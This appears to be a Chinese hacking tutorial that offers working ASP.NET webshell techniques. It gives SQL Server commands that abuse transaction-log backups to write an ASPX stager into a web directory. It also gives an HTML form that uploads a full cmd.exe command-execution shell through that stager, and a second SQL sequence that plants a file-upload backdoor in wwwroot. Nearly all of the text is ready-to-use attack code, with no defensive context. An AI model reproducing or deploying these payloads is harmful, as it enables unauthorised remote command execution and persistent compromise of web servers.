aspx的一句话木马

from:Security Box

1.相当于ASP的一句话木马:

1 alter   database  pubs  set  RECOVERY  FULL --
2 create   table  pubs.dbo.cmd(a  image )
3 backup   log  pubs  to   disk   =   ' c:\TM '   with  init
4 insert   into  pubs.dbo.cmd(a)  values  ( ' <%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%>  ' )
5 backup   log  pubs  to   disk   =   ' d:\test11.aspx '

mu.aspx.htm 客户端:(提交后访问:http://IP/images.aspx)

 1 < form  action =http://192.168.2.100/asp/mu.aspx  method =post >  
 2 < b > 在下面输入大马内容: </ b >< br >
 3 < textarea  name =l  cols =120  rows =35  width =45 >  
 4 <% @ Page Language="VB" Debug="true"  %>
 5 <% @ import Namespace="system.IO"  %>
 6 <% @ import Namespace="System.Diagnostics"  %>
 7 < script  runat ="server" >  
 8    Sub RunCmd(Src As Object, E As EventArgs) 
 9        Dim myProcess As New Process() 
10        Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text) 
11        myProcessStartInfo.UseShellExecute = False 
12        myProcessStartInfo.RedirectStandardOutput = true 
13        myProcess.StartInfo = myProcessStartInfo 
14        myProcessStartInfo.Arguments=xCmd.text
15        myProcess.Start()
16        Dim myStreamReader As StreamReader = myProcess.StandardOutput 
17        Dim myString As String = myStreamReader.Readtoend()
18        myProcess.Close()
19        mystring=replace(mystring,"<","<")
20        mystring=replace(mystring,">",">")
21        result.text= vbcrlf & "<pre>" & mystring & "</pre>"
22    End Sub 
23 </ script >
24 < html >< head >
25 < title > ASP.NET Shell for WebAdmin2.X Final </ title >
26 < meta  http-equiv ="Content-Type"  c  /></ head >< body >
27 < form  runat ="server" >
28 < asp:Label  id ="L_p"  style ="COLOR: #0000ff"  runat ="server"  width ="80px" > ;Program </ asp:Label >
29 < asp:TextBox  id ="xpath"  style ="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid"  runat ="server"  Width ="300px" > c:\windows\system32\cmd.exe </ asp:TextBox >< br  />
30 < asp:Label  id ="L_a"  style ="COLOR: #0000ff"  runat ="server"  width ="80px" > Arguments </ asp:Label >
31 < asp:TextBox  id ="xcmd"  style ="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid"  runat ="server"  Width ="300px"  Text ="/c net user" > /c net user </ asp:TextBox >< br  />
32 < asp:Button  id ="Button"  style ="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5"  runat ="server"  Width ="100px"  Text ="Run" ></ asp:Button >< p >
33 < asp:Label  id ="result"  style ="COLOR: #0000ff"  runat ="server" ></ asp:Label >   </ p ></ form ></ body ></ html >
34 </ textarea >< BR >< center >< br >  
35 < input  type =submit  value =提交 >

2、下面这个是我找网上的asp.net的上传文件程序，修改精简了下，也可以用：

1 drop   table  pubs.dbo.cmd
2 alter   database  pubs  set  RECOVERY  FULL
3 create   table  pubs.dbo.cmd(a  image )
4 backup   log  pubs  to   disk   =   ' c:\TM '   with  init
5 insert   into  pubs.dbo.cmd(a)  values  ( ' <script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" /></form> ' )
6 backup   log  pubs  to   disk   =   ' c:\inetpub\wwwroot\test11.aspx '